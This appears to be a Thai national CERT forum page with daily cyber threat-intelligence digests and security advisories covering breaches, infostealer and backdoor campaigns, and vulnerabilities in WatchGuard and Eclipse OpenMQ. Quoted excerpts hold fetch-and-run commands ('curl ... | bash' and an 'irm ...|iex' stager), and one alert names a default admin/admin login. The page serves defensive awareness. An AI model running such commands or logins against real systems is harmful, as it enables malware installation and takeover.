ข้อมูลกลุ่ม ส่วนตัว

Global Moderators

Forum wide moderators

รายชื่อสมาชิก
  • Cyber Threat Intelligence 11 March 2026

    Vulnerabilities

    Malware

    Breaches/Hacks/Leaks

    • Cal AI, New Owner Of MyFitnessPal, Hit By Alleged Breach Of 3 Million Users
      "A hacker using the alias “vibecodelegend” is claiming responsibility for breaching Cal AI, a smartphone application that uses artificial intelligence to track calories and nutritional information. The alleged breach was announced on Monday, March 9, 2026, through a post on the cybercrime marketplace BreachForums. Cal AI has grown rapidly in popularity due to its use of artificial intelligence to help users track calories by analyzing food images and nutritional information. The platform recently attracted further attention after acquiring the widely used fitness app MyFitnessPal, expanding its presence in the health and nutrition tracking market."
      https://hackread.com/cal-ai-myfitnesspal-data-breach-3m-users/

    General News

    • Stop Chasing Threats, Start Containing Them
      "Security teams aren't short on tools or effort. Yet many organizations are still falling behind. According to Cyderes' recent white paper, 88% of organizations maintain a security operations center but only 45% report effectiveness in proactive threat hunting. The picture is clear: SOCs are overwhelmed and additional investments aren't closing the gap. Alerts are piling up. Talent is burning out. Identity is fragmented across IT, security and HR, with no clear ownership. As cloud workloads grow, confidence in stopping identity-based attacks remains low."
      https://www.bankinfosecurity.com/blogs/stop-chasing-threats-start-containing-them-p-4058
      https://www.cyderes.com/hubfs/FINAL WhitePaper Design_02_18_26.pdf
    • Global Cyber Attacks Remain Near Record Highs In February 2026 Despite Ransomware Decline
      "In February 2026, global cyber attack activity remained near record levels, confirming that elevated attack volumes are becoming the new normal for organizations worldwide. The average number of weekly cyber attacks per organization reached 2,086, representing a 9.6% increase year over year, while remaining essentially flat month over month (-0.2% compared to January 2026). This stabilization at a high baseline reflects a sustained pressure environment rather than a short‑term surge."
      https://blog.checkpoint.com/research/global-cyber-attacks-remain-near-record-highs-in-february-2026-despite-ransomware-decline/
    • Teen Crew Caught Selling DDoS Attack Tools
      "Seven minors who distributed online programs designed to facilitate DDoS attacks have been identified by Poland’s Central Bureau for Combating Cybercrime (CBZC). They were between 12 and 16 at the time of the crime. According to investigators, using the tools they administered, the minors attacked popular websites, including auction and sales portals, IT domains, hosting services and accommodation booking sites. The activity was profit-driven, with the suspects earning money from the operation."
      https://www.helpnetsecurity.com/2026/03/10/poland-minors-identified-distributing-ddos-attack-tools/
      https://www.theregister.com/2026/03/10/poland_ddos_teens_bust/
    • Airbus CSO On Supply Chain Blind Spots, Space Threats, And The Limits Of AI Red-Teaming
      "Pascal Andrei, CSO at Airbus, knows that the aerospace and defense sector is facing a threat environment that is evolving faster than most organizations can track. From sub-tier suppliers quietly becoming entry points for state-backed attackers, to satellites emerging as targets in an increasingly contested space domain, the risks are real and growing. In this interview with Help Net Security, Andrei addresses the blind spots that defenders are underestimating, the gap between compliance paperwork and actual security outcomes, and why current AI red-teaming models fall dangerously short."
      https://www.helpnetsecurity.com/2026/03/10/pascal-andrei-airbus-aerospace-defense-cybersecurity/
    • The People Behind Cyber Extortion Are Often In Their Forties
      "Many cybercrime investigations end with arrests or indictments that reveal little about the people behind the operations. When authorities do disclose demographic details, the pattern that emerges does not match the common assumption that cyber offenders are mostly very young. Analysis in the Security Navigator 2026 report from Orange Cyberdefense points to a different age profile, with a strong concentration of offenders in mid-career adulthood."
      https://www.helpnetsecurity.com/2026/03/10/cyber-extortion-cybercrime-age-profile/
    • Bug Bounties Are Broken, And The Best Security Pros Are Moving On
      "Penetration testing engagements are organized as scheduled contracts with defined scope, set testing windows, and direct communication channels with client teams. Cobalt’s 2026 Pentester Profile Report describes growing preference for penetration testing as a service (PTaaS) and contract-based testing models. Many participants prefer contract-based testing over open bug bounty programs and prioritize predictable professional income tied to guaranteed engagements. Pentesting serves as the primary occupation for a large share of this group. Most participants bring years of field experience and describe career goals centered on staying hands-on and maintaining technical standards."
      https://www.helpnetsecurity.com/2026/03/10/cobalt-ptaas-gains-pentester-support/
    • Only 24% Of Organizations Test Identity Recovery Every Six Months
      "Just 24% of organizations test their identity disaster recovery plans every six months, according to new research which examined how businesses prepare for identity-focused cyber-attacks. The findings suggested that despite rising investment in identity threat detection and response (ITDR), many organizations remain poorly prepared to restore critical authentication systems after a breach. The data comes from Quest Software’s latest report, a global survey of 650 IT and security practitioners and executives. The study found that many companies place heavy emphasis on preventative controls and threat detection while neglecting response and recovery readiness."
      https://www.infosecurity-magazine.com/news/organizations-test-identity-sec-6/
    • SIM Swaps Expose a Critical Flaw In Identity Security
      "For years, organizations have treated mobile phone numbers as trusted identity anchors. They are used to reset passwords, deliver one-time passcodes, and verify user identity. That trust is now fundamentally misplaced. SIM swap attacks have exposed a structural weakness in how identity is verified, recovered, and monitored across consumer and enterprise systems. In a SIM swap attack, criminals persuade a mobile carrier representative — often through social engineering or insider collusion — to transfer a victim’s phone number to a SIM card under the attacker’s control."
      https://www.securityweek.com/sim-swaps-expose-a-critical-flaw-in-identity-security/
    • Protecting Democracy Means Democratizing Cybersecurity. Bring On The Hackers
      "The hacker mind is a curious way to be. To have it means to embody endless analytical curiosity, an awareness of any given rule set as just one system among many, and an ability to see any system in ways that its creators never expected. Combine this with a drive to find the bad and make things better, and you become one of the fundamental forces of the technological universe."
      https://www.theregister.com/2026/03/10/democratizing_security_opinion/
    • CISOs In a Pinch: A Security Analysis Of OpenClaw
      "The viral rise of OpenClaw (formerly Clawdbot) marks the end of the "chatbot" era and the beginning of the "sovereign agent" era. While the productivity gains of having a locally hosted AI that controls your terminal are immense, the security implications are catastrophic. We are effectively granting root access to probabilistic models that can be tricked by a simple WhatsApp message. The "Lethal Trifecta" of AI security just got a fourth dimension: Persistence."
      https://www.trendmicro.com/en_us/research/26/c/cisos-in-a-pinch-a-security-analysis-openclaw.html

    อ้างอิง
    Electronic Transactions Development Agency (ETDA) 8da35d7e-f7da-4e0e-bff6-1e3a7e12505e-image.png

    โพสต์ใน Cyber Security News
  • 🚨 เตือนภัยผู้ใช้ Mac เว็บไซต์ CleanMyMac ปลอมระบาดหนัก พบใช้เทคนิคหลอกรันคำสั่ง ขโมยรหัสผ่านและคริปโต

    ศูนย์ประสานการรักษาความมั่นคงปลอดภัยระบบคอมพิวเตอร์แห่งชาติ (ThaiCERT) ได้ติดตามสถานการณ์ด้านความมั่นคงปลอดภัยทางไซเบอร์ พบว่าช่องโหว่บนระบบปฏิบัติการ macOS กำลังเพิ่มสูงขึ้นอย่างต่อเนื่อง ล่าสุดนักวิจัยด้านความปลอดภัยพบแคมเปญแพร่กระจายมัลแวร์ "SHub Stealer" ที่แฝงตัวมาในคราบโปรแกรมทำความสะอาดเครื่องยอดฮิตอย่าง CleanMyMac เพื่อมุ่งเป้าขโมยสินทรัพย์ดิจิทัลและข้อมูลสำคัญ ซึ่งสอดคล้องกับเทรนด์การโจมตีทางไซเบอร์ที่มุ่งเป้าไปที่กระเป๋าเงินดิจิทัลทั่วโลก

    1. กลุ่มเป้าหมายหลักที่ตกอยู่ในความเสี่ยง
      ผู้ใช้งาน Mac ที่กำลังมองหาโปรแกรมทำความสะอาดระบบ (System Cleanup) และผู้ที่ถือครองคริปโตเคอร์เรนซี (Cryptocurrency) ผ่านแอปพลิเคชันอย่าง Exodus, Ledger หรือ Trezor
      สาเหตุที่กลุ่มนี้มีความเสี่ยงสูง เนื่องจากแฮกเกอร์จงใจออกแบบมัลแวร์มาเพื่อเจาะกระเป๋าเงินดิจิทัลโดยเฉพาะ รวมถึงมุ่งเป้าไปที่การดึงข้อมูลรหัสผ่านที่ถูกบันทึกไว้ใน macOS Keychain

    2. รูปแบบการโจมตีที่พบ
      2.1 การหลอกลวงให้ผู้ใช้รันสคริปต์อันตรายด้วยตนเอง เว็บไซต์ปลอมจะหลอกให้เหยื่อคัดลอกคำสั่งไปรันใน Terminal ด้วยตัวเอง ซึ่งวิธีการนี้ทำให้ตัวมัลแวร์สามารถข้ามระบบรักษาความปลอดภัย (Gatekeeper) ของ Mac ไปได้อย่างแนบเนียน
      2.2 หลบเลี่ยงการตรวจจับ มัลแวร์จะเช็กภาษาของแป้นพิมพ์ หากพบว่าเป็นภาษารัสเซียจะหยุดทำงานทันที เพื่อหลบหนีการตรวจสอบและลดความสนใจจากหน่วยงานบังคับใช้กฎหมายในพื้นที่ของผู้พัฒนา
      2.3 ดักขโมยข้อมูลสำคัญ มัลแวร์จะแสดงหน้าต่างปลอมเพื่อหลอกให้กรอกรหัสผ่านของเครื่อง หากผู้ใช้หลงเชื่อ แฮกเกอร์จะสามารถเข้าถึงรหัสผ่านทั้งหมดที่เก็บไว้ใน Keychain รวมถึงข้อมูล Wi-Fi ได้ทันที
      2.4 แทรกแซงกระเป๋าเงินคริปโต ตัวมัลแวร์จะเข้าไปปรับเปลี่ยนแอปฯ กระเป๋าเงินยอดนิยม เพื่อสร้างหน้าต่างหลอกให้กรอก "วลีกู้คืน (Seed Phrase)" หากป้อนข้อมูลลงไป แฮกเกอร์จะสามารถสูบเงินคริปโตออกไปได้ทั้งหมด
      2.5 แฝงตัวถาวรแนบเนียน มัลแวร์จะสร้างการทำงานเบื้องหลัง (LaunchAgent) โดยใช้ชื่อไฟล์เลียนแบบระบบอัปเดตที่ถูกต้องของ Google (Keystone) เพื่อแอบส่งข้อมูลกลับไปหาแฮกเกอร์ในทุกๆ นาที

    ความน่ากลัวของมัลแวร์ "SHub Stealer" คือแฝงตัวอยู่ในเครื่องของเราได้โดยปลอมแปลงตัวเองเป็นไฟล์อัปเดตของ Google การทำแบบนี้ช่วยให้สามารถทำงานอยู่เบื้องหลัง และคอยส่งข้อมูลกลับไปหาแฮกเกอร์ได้อย่างต่อเนื่อง ทำให้แฮกเกอร์ควบคุมเครื่องและดึงข้อมูลเพิ่มเติมได้ตลอดเวลา

    1. วิธีป้องกันตัวและรับมือการโจมตี
      3.1 ดาวน์โหลด ซอฟต์แวร์จากเว็บไซต์ทางการ (Official) ของผู้พัฒนา หรือโหลดผ่าน Mac App Store เท่านั้น
      3.2 ตรวจสอบ URL ของเว็บไซต์ให้แน่ใจทุกครั้งว่าสะกดถูกต้อง ไม่มีตัวอักษรผิดเพี้ยนก่อนกดโหลดโปรแกรมใดๆ
      3.3 หลีกเลี่ยง การก๊อปปี้คำสั่งจากเว็บไซต์ที่ไม่คุ้นเคยไปรันใน Terminal เด็ดขาด หากคุณไม่เข้าใจว่าคำสั่งนั้นทำงานอย่างไร
      3.4 เฝ้าระวัง หน้าต่าง Pop-up ที่เด้งขึ้นมาขอรหัสผ่านเครื่อง หรือขอ Seed Phrase ของคริปโต หากมีข้อความแปลกๆ หรือสะกดผิดแกรมม่า ห้ามกรอกเด็ดขาด
      3.5 อัปเดตระบบปฏิบัติการ macOS และโปรแกรมแอนตี้ไวรัส (ถ้ามี) ให้เป็นเวอร์ชันล่าสุดอยู่เสมอ เพื่ออุดช่องโหว่ความปลอดภัย

    🔗 แหล่งอ้างอิง: Hackread (https://dg.th/i7aehpvk1n)
    #CyberSecurity #macOS #CleanMyMac #MalwareAlert #CryptoSecurity #SHubStealer #Infostealer

    CleanMyMac.png

    โพสต์ใน Cyber Security News
  • CISA เพิ่มช่องโหว่ที่ถูกใช้โจมตี 3 รายการลงในแคตตาล็อก

    เมื่อวันที่ 9 มีนาคม 2026 Cybersecurity and Infrastructure Security Agency (CISA) ได้เพิ่มช่องโหว่ใหม่ 3 รายการลงในแคตตาล็อก Known Exploited Vulnerabilities (KEV) จากหลักฐานที่พบว่ามีการโจมตีใช้งานจริงแล้ว ดังนี้

    • CVE-2021-22054 Omnissa Workspace ONE Server-Side Request Forgery
    • CVE-2025-26399 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
    • CVE-2026-1603 Ivanti Endpoint Manager (EPM) Authentication Bypass Vulnerability

    ทาง CISA จะปรับปรุงและเพิ่มช่องโหว่ใหม่เข้าสู่แคตตาล็อก KEV อย่างต่อเนื่อง เพื่อให้ครอบคลุมความเสี่ยงที่ตรวจพบจริงในปัจจุบันและอนาคต

    อ้างอิง
    https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog
    สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 5fc7994a-c59a-4219-b85a-e9534be80af3-image.png

    โพสต์ใน Cyber Security News
  • Cyber Threat Intelligence 10 March 2026

    Industrial Sector

    New Tooling

    Vulnerabilities

    • CISA Adds Three Known Exploited Vulnerabilities To Catalog
      "CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
      CVE-2021-22054 Omnissa Workspace ONE Server-Side Request Forgery
      CVE-2025-26399 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
      CVE-2026-1603 Ivanti Endpoint Manager (EPM) Authentication Bypass Vulnerability"
      https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog
    • Partnering With Mozilla To Improve Firefox’s Security
      "AI models can now independently identify high-severity vulnerabilities in complex software. As we recently documented, Claude found more than 500 zero-day vulnerabilities (security flaws that are unknown to the software’s maintainers) in well-tested open-source software. In this post, we share details of a collaboration with researchers at Mozilla in which Claude Opus 4.6 discovered 22 vulnerabilities over the course of two weeks. Of these, Mozilla assigned 14 as high-severity vulnerabilities—almost a fifth of all high-severity Firefox vulnerabilities that were remediated in 2025. In other words: AI is making it possible to detect severe security vulnerabilities at highly accelerated speeds."
      https://www.anthropic.com/news/mozilla-firefox-security
      https://securityaffairs.com/189131/ai/anthropic-claude-opus-ai-model-discovers-22-firefox-bugs.html
    • AI Vs AI: Agent Hacked McKinsey's Chatbot And Gained Full Read-Write Access In Just Two Hours
      "Researchers at red-team security startup CodeWall say their AI agent hacked McKinsey's internal AI platform and gained full read and write access to the chatbot in just two hours. It's yet another indicator that agentic AI is becoming a more effective tool for conducting cyberattacks, including those against other AI systems. This attack wasn’t conducted with malicious intent. However, threat hunters tell us that miscreants are increasingly using agents in real-world attacks, indicating that machine-speed intrusions aren't going away."
      https://www.theregister.com/2026/03/09/mckinsey_ai_chatbot_hacked/

    Malware

    • New A0Backdoor Linked To Teams Impersonation And Quick Assist Social Engineering
      "BlueVoyant Security Operations Center (SOC) and Threat Fusion Cell (TFC) continue to track an activity cluster that uses email bombing and IT-support impersonation over Microsoft Teams to obtain Quick Assist access, then pivot to a deeper attack. This research shows that once on the victim’s host, the actors sideload a malicious DLL to deliver a new backdoor BlueVoyant has dubbed the A0Backdoor. The malware’s loader exhibits anti-sandbox evasion, and the campaign’s command-and-control appears to have pivoted to a covert DNS mail exchange-based channel that confines endpoint traffic to trusted recursive resolvers."
      https://www.bluevoyant.com/blog/new-a0backdoor-linked-to-teams-impersonation-and-quick-assist-social-engineering
      https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-targets-employees-with-backdoors/
    • ShinyHunters Claims Ongoing Salesforce Aura Data Theft Attacks
      "Salesforce is warning customers that hackers are targeting websites with misconfigured Experience Cloud platforms that give guest users access to more data than intended. However, the ShinyHunters extortion gang claims to be actively exploiting a new bug to steal data from instances. Salesforce has shared guidance for its customers to defend against hackers actively targeting the /s/sfsites/aura API endpoint on misconfigured Experience Cloud instances that gives guest users access to more data than intended. The company states that attackers are deploying a modified version of AuraInspector, an open-source auditing tool developed by Mandiant, which can help administrators identify access control misconfigurations within the Salesforce Aura framework."
      https://www.bleepingcomputer.com/news/security/shinyhunters-claims-ongoing-salesforce-aura-data-theft-attacks/
      https://www.salesforce.com/blog/protecting-your-data-essential-actions-to-secure-experience-cloud-guest-user-access/
      https://www.theregister.com/2026/03/09/shinyhunters_claims_more_highprofile_victims/
    • FBI Warns Of Phishing Attacks Impersonating US City, County Officials
      "The Federal Bureau of Investigation (FBI) warns that criminals are impersonating U.S. officials in phishing attacks targeting businesses and individuals who request city and county planning and zoning permits. In a public service announcement published on Monday, the bureau said that the criminals behind this campaign are identifying potential victims using publicly available information, which also makes their malicious messages seem legitimate and helps them trick suspicious targets."
      https://www.bleepingcomputer.com/news/security/fbi-warns-of-phishing-attacks-impersonating-us-city-county-officials/
      https://www.ic3.gov/PSA/2026/PSA260309
      https://securityaffairs.com/189165/cyber-crime/fbi-alert-scammers-target-zoning-permit-applicants.html
    • China-Nexus Activity Against Qatar Observed Amid Expanding Regional Tensions
      "Since the recent escalation in the Middle East, Check Point Research has observed increased activity by Chinese-nexus APT actors in the region, particularly targeting Qatar. The Chinese-nexus threat actor Camaro Dragon attempted to deploy a variant of PlugX malware against Qatari targets within one day of the launch of Operation Epic Fury and the onset of the escalation in the Middle East. The attackers leveraged the ongoing war in the Middle East to make their lures more credible and engaging, demonstrating the ability to rapidly adapt to major developments and breaking news."
      https://blog.checkpoint.com/research/china-nexus-activity-against-qatar-observed-amid-expanding-regional-tensions/
      ACSC, NCSC, And CERT Tonga Warn Of Growing INC Ransom Activity Targeting Healthcare And Organizations Across Australia, New Zealand, And Pacific States.
      "Cybersecurity agencies across the Pacific region are sharing concerns about the ransomware group INC Ransom’s expanding activities and the growing influence of its affiliate network. A joint advisory issued by the Australian Cyber Security Centre (ACSC), National Computer Emergency Response Team Tonga (CERT Tonga), and the New Zealand National Cyber Security Centre (NCSC) highlights how the INC Ransom ecosystem has become an active threat to organizations in Australia, New Zealand, and Pacific Island states."
      https://cyble.com/blog/inc-ransom-attacks-australia-new-zealand/
    • Hackerbot-Claw: Adversarial Agent Targets Top GitHub Repos
      "Pillar Security researchers analyzed the hackerbot-claw campaign, we named “Chaos Agent” - the first publicly documented campaign where an AI agent, operating on natural-language instructions, conducted an end-to-end attack against production open-source infrastructure. Within 37 hours, hackerbot-claw identified vulnerable open-source projects, crafted targeted exploits, compromised CI/CD pipelines, and published a malicious extension that turned developers' own AI coding tools into credential-stealing accomplices."
      https://www.pillar.security/blog/hackerbot-claw-adversarial-agent-targets-top-github-repos
      https://hackread.com/ai-bot-hackerbot-claw-microsoft-datadog-github-repos/
    • Someone Else’s SIEM: A Threat Actor Abuses Another Free Trial
      "Huntress discovered a threat actor was exploiting vulnerabilities (like SolarWinds Web Help Desk) and exfiltrating victim data to a free trial instance of Elastic Cloud SIEM. The actor used the SIEM for victim triage, and the infrastructure revealed details about their campaign, including disposable email services (quieresmail.com), connections to a Russian-registered temporary email network (firstmail.ltd), use of a SAFING_VPN tunnel, and a possible connection to other opportunistic attacks against Microsoft SharePoint and other software. The instance has since been taken down."
      https://www.huntress.com/blog/threat-actor-abuses-elastic-cloud-siem
      https://www.infosecurity-magazine.com/news/elastic-cloud-siem-manage-stolen/
    • Fake Claude Code Install Pages Hit Windows And Mac Users With Infostealers
      "Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments. Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter.​ That habit turns the website into a remote control: whatever script lives at that URL runs with your permissions, often those of an administrator."
      https://www.malwarebytes.com/blog/news/2026/03/fake-claude-code-install-pages-hit-windows-and-mac-users-with-infostealers
    • Quiz Sites Trick Users Into Enabling Unwanted Browser Notifications
      "Our support team flagged a number of customers who suspected their device might be infected with malware, but Malwarebytes scans came up empty. When the customers provided screenshots, our Malware Removal Support team quickly recognized the format as web push notifications. The reason the scans came up clean is that these notifications aren’t malware on the device. They’re browser notifications from websites that trick users into clicking “Allow.”"
      https://www.malwarebytes.com/blog/threat-intel/2026/03/quiz-sites-trick-users-into-enabling-unwanted-browser-notifications
    • GhostClaw Unmasked: A Malicious Npm Package Impersonating OpenClaw To Steal Everything
      "The JFrog Security research team has identified a live malicious npm package named @openclaw-ai/openclawai. This package masquerades as a legitimate CLI tool called "OpenClaw Installer" while deploying a multi-stage infection chain that steals system credentials, browser data, crypto wallets, SSH keys, Apple Keychain databases, iMessage history, and more - then installs a persistent RAT with full remote access capabilities including a SOCKS5 proxy and live browser session cloning. The attack is notable for its broad data collection, its use of social engineering to harvest the victim's system password, and the sophistication of its persistence and C2 infrastructure. Internally, the malware identifies itself as GhostLoader."
      https://research.jfrog.com/post/ghostclaw-unmasked/
      https://thehackernews.com/2026/03/malicious-npm-package-posing-as.html
    • From a Sophisticated Browser-Extension Supply-Chain Compromise To a VibeCoded Twist: A Chrome Extension As The Initial Access Vector For a Broader Malware Chain
      "A formerly legitimate Featured Chrome extension (ShotBird) was turned into a remote-controlled malware channel after an apparent ownership transfer. The malicious version beaconed to attacker infrastructure, received callback-delivered JavaScript tasks, stripped browser security headers, injected fake Chrome update lures, and captured sensitive form data. In the observed Windows file-delivery path, victims were pushed to run googleupdate.exe, a fake update wrapper that carried a real Google-signed ChromeSetup.exe alongside a malicious psfx.msi stager. Host-side PowerShell 4104 logs later confirmed execution of the decoded stager irm orangewater00.com|iex and allowed reconstruction of a larger second stage with ETW suppression, Credential Manager access, Chromium data targeting, and upload logic. In short: this was not just extension abuse, but a browser-to-endpoint compromise chain with likely credential-theft capability."
      https://monxresearch-sec.github.io/shotbird-extension-malware-report/
      https://thehackernews.com/2026/03/chrome-extension-turns-malicious-after.html

    Breaches/Hacks/Leaks

    • Ericsson US Discloses Data Breach After Service Provider Hack
      "Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to an undisclosed number of employees and customers after hacking one of its service providers. Headquartered in Stockholm and founded in 1876, the parent company is a communications tech leader with nearly 90,000 employees worldwide. In data breach notification letters sent to affected individuals and filed with the California Attorney General on Monday, Ericsson said that a service provider who was storing personal data for employees and customers discovered a breach on April 28, 2025."
      https://www.bleepingcomputer.com/news/security/ericsson-us-discloses-data-breach-after-service-provider-hack/
    • EV Charger Biz ELECQ Zapped By Ransomware Crooks, Customer Contact Data Stolen
      "ELECQ, maker of smart electric vehicle (EV) chargers, is warning customers that their personal details may have been stolen in a ransomware attack that encrypted and copied user data from its cloud systems. In a notice sent to customers on Monday and seen by The Register, the EV charging outfit said that it detected "unusual activity" on its AWS cloud platform on March 7 and quickly discovered that attackers had launched a ransomware attack against parts of its infrastructure."
      https://www.theregister.com/2026/03/09/ransomware_crooks_hit_ev_charger/

    General News

    อ้างอิง
    Electronic Transactions Development Agency (ETDA) 6337f8a0-8b97-4059-b4cc-4dfda0bfa3ce-image.png

    โพสต์ใน Cyber Security News
  • 🚨เตือน! พบการโจมตีแบบฟิชชิงผ่าน Microsoft Teams เพื่อติดตั้งมัลแวร์

    ศูนย์ประสานการรักษาความมั่นคงปลอดภัยระบบคอมพิวเตอร์แห่งชาติ (ThaiCERT) ติดตามสถานการณ์ภัยคุกคามทางไซเบอร์ พบรายงานภัยคุกคามทางไซเบอร์ โดยการใช้ Social Engineering ผ่านระบบสนทนาใน Microsoft Teams และเปิดช่องทางการเข้าถึงเครื่องคอมพิวเตอร์ จากนั้นผู้โจมตีจะติดตั้งมัลแวร์ประเภท Backdoor ที่เรียกว่า A0Backdoor

    1. รายละเอียดเหตุการณ์
      • ผู้โจมตีจะส่งอีเมลสแปมจำนวนมากไปยังเหยื่อ เพื่อสร้างสถานการณ์ว่าระบบอีเมลของเหยื่อมีปัญหา และจะติดต่อผ่าน Microsoft Teams โดยแอบอ้างเป็นเจ้าหน้าที่ฝ่าย IT เพื่อเปิดช่องทางการเข้าถึงเครื่องคอมพิวเตอร์

    2. พฤติกรรมการโจมตี
      • ผู้โจมตีจะส่งอีเมลสแปมจำนวนมากไปยังเหยื่อ เพื่อสร้างสถานการณ์ว่าระบบอีเมลของเหยื่อมีปัญหา และจะติดต่อผ่าน Microsoft Teams โดยแอบอ้างเป็นเจ้าหน้าที่ฝ่าย IT
      • หลอกให้เหยื่อเปิดใช้งาน Quick Assist เพื่อให้ผู้โจมตีเข้าควบคุมเครื่อง
      • หลังจากเข้าควบคุมครื่องได้แล้ว ผู้โจมตีจะติดตั้งไฟล์ (MSI) ที่เป็นอันตราย โดยไฟล์ดังกล่าวถูกโฮสต์ไว้บนคลาวด์ของ Microsoft ที่เป็นบัญชีส่วนบุคคลของผู้โจมตี
      • ไฟล์ดังกล่าวจะปลอมแปลงเป็นส่วนประกอบของ Microsoft Teams และ CrossDeviceService ซึ่งเป็นเครื่องมือของ Windows
      • เมื่อทำการติดตั้งแล้ว มัลแวร์ A0Backdoor จะเปิดช่องทางให้ผู้โจมตีเข้าควบคุมระบบ

    3. แนวทางป้องกันและลดความเสี่ยง
      • กำหนดนโยบายจำกัดการติดต่อจาก บัญชี Microsoft Teams ภายนอกองค์กร
      • หลีกเลี่ยงการเปิดใช้งาน Quick Assist หรือ Remote Access
      • ตรวจสอบและติดตามการติดตั้งไฟล์ MSI หรือโปรแกรมที่ไม่ได้รับอนุญาต
      • จำกัดสิทธิ์การติดตั้งซอฟต์แวร์ของผู้ใช้งานทั่วไป
      • ใช้งานระบบ Endpoint Detection and Response (EDR) หรือระบบตรวจจับภัยคุกคามเพื่อเฝ้าระวังพฤติกรรมผิดปกติ

    4. แหล่งอ้างอิง (References)
      https://dg.th/ty86mhid20

    หากมีบุคคลจะติดต่อผ่าน Microsoft Teams และอ้างว่าเป็นเจ้าหน้าที่ฝ่าย IT ควรตรวจสอบตัวตนผ่านช่องทางภายในองค์กรก่อนทุกครั้ง

    Microsoft Teams.png

    โพสต์ใน Cyber Security News
  • ด่วน! Patch หรือยัง? WatchGuard ออกอัปเดตแก้ช่องโหว่ร้ายแรงใน Fireware OS

    ⚠️ ThaiCERT ได้ติดตามสถานการณ์ภัยคุกคามทางไซเบอร์ และพบประกาศด้านความมั่นคงปลอดภัยจาก WatchGuard เกี่ยวกับช่องโหว่ CVE-2026-3342 ซึ่งเป็นช่องโหว่ประเภท Out-of-bounds Write ใน WatchGuard Fireware OS โดยอาจเปิดโอกาสให้ ผู้โจมตีที่ยืนยันตัวตนแล้วและมีสิทธิ์ผู้ดูแลระดับ privileged administrator สามารถใช้ management interface ที่เปิดเข้าถึงได้ เพื่อ รันโค้ดด้วยสิทธิ์ root บนอุปกรณ์ที่ได้รับผลกระทบ ส่งผลให้มีความเสี่ยงสูงต่อการถูกยึดระบบหรือแก้ไขการตั้งค่าความมั่นคงปลอดภัยของอุปกรณ์.

    1. รายละเอียดช่องโหว่
      CVE-2026-3342 - Out-of-bounds Write in WatchGuard Fireware OS (CVSS v3.1: 7.2)
      ช่องโหว่นี้เกิดจากการเขียนข้อมูลเกินขอบเขตหน่วยความจำและอาจทำให้ผู้ดูแลระบบที่ผ่านการยืนยันตัวตนแล้ว สามารถ execute arbitrary code with root permissions ผ่าน exposed management interface ได้

    2. ผลิตภัณฑ์ที่ได้รับผลกระทบ

    • Fireware OS 11.9 ถึง 11.12.4_Update1
    • Fireware OS 12.0 ถึง 12.11.7
    • Fireware OS 2025.1 ถึง 2026.1.1
    1. แนวทางการแก้ไข
    • อัพเดท Fireware OS 2026.1.2
    • อัพเดท Fireware OS 12.11.8
    • สำหรับ Fireware OS 12.5.x (T15 & T35 models) ให้อัปเดตเป็น 12.5.17
    • สำหรับ Fireware OS 11.x ผู้ผลิตระบุว่าเป็น End of Life แล้ว จึงควรวางแผนอัปเกรดหรือเปลี่ยนทดแทนโดยเร็ว.
    1. หากยังไม่สามารถอัปเดตได้ ควรดำเนินการดังนี้
      ไม่มี workaround สำหรับช่องโหว่นี้ควรรีบดำเนินการอัพเดทโดยด่วน

    2. แหล่งอ้างอิง

    WatchGuard12.png

    โพสต์ใน Cyber Security News
  • ด่วน! แจ้งเตือนช่องโหว่ใน Eclipse OpenMQ

    ⚠️ ThaiCERT ได้ติดตามสถานการณ์ภัยคุกคามทางไซเบอร์ และพบประกาศด้านความปลอดภัยเกี่ยวกับช่องโหว่ CVE-2026-22886 ซึ่งกระทบต่อ Eclipse OpenMQ โดยเป็นปัญหาการใช้ ข้อมูลรับรองเริ่มต้น (default credentials) ใน TCP-based management service ชื่อ imqbrokerd ทำให้ผู้โจมตีที่สามารถเข้าถึงพอร์ตของบริการนี้ สามารถเข้าสู่ระบบด้วยบัญชีผู้ดูแลเริ่มต้น admin/admin และเข้าควบคุมความสามารถด้านการบริหารจัดการของระบบได้ทั้งหมด

    1. รายละเอียดช่องโหว่
      CVE-2026-22886 - Use of Default Credentials / Default Password (CVSS v3.1: 9.8)
      ช่องโหว่นี้เกิดจากระบบมีบัญชีผู้ดูแลค่าเริ่มต้นและไม่บังคับเปลี่ยนรหัสผ่านเมื่อใช้งานครั้งแรกส่งผลให้รหัสผ่านเริ่มต้นยังคงใช้ได้อย่างต่อเนื่อง หากผู้โจมตีเข้าถึงพอร์ตของบริการ imqbrokerd ได้ ก็สามารถยืนยันตัวตนเป็นผู้ดูแลและเข้าควบคุมฟังก์ชันการบริหารจัดการของ broker ได้

    2. ผลิตภัณฑ์ที่ได้รับผลกระทบ
      Eclipse OpenMQ ทุกเวอร์ชัน

    3. แนวทางการแก้ไข

    • เปลี่ยนรหัสผ่านเริ่มต้นของ Eclipse OpenMQ
    1. แนวทางลดความเสี่ยง
    • ตรวจสอบทันทีว่ามีการเปิดใช้บริการ imqbrokerd หรือไม่
    • ปิด service ดังกล่าวหากไม่จำเป็น
    • หากจำเป็นต้องใช้งานให้เปลี่ยนรหัสผ่านเริ่มต้นของบัญชีผู้ดูแลทันทีเป็นรหัสผ่านที่รัดกุมและไม่ซ้ำ
    • จำกัดการเข้าถึงพอร์ตให้เฉพาะผู้ดูแลที่ได้รับอนุญาต

    5.แหล่งอ้างอิง

    Eclipse OpenMQ.png

    โพสต์ใน Cyber Security News
  • Cyber Threat Intelligence 09 March 2026

    Industrial Sector

    • APT And Financial Attacks On Industrial Organizations In Q4 2025
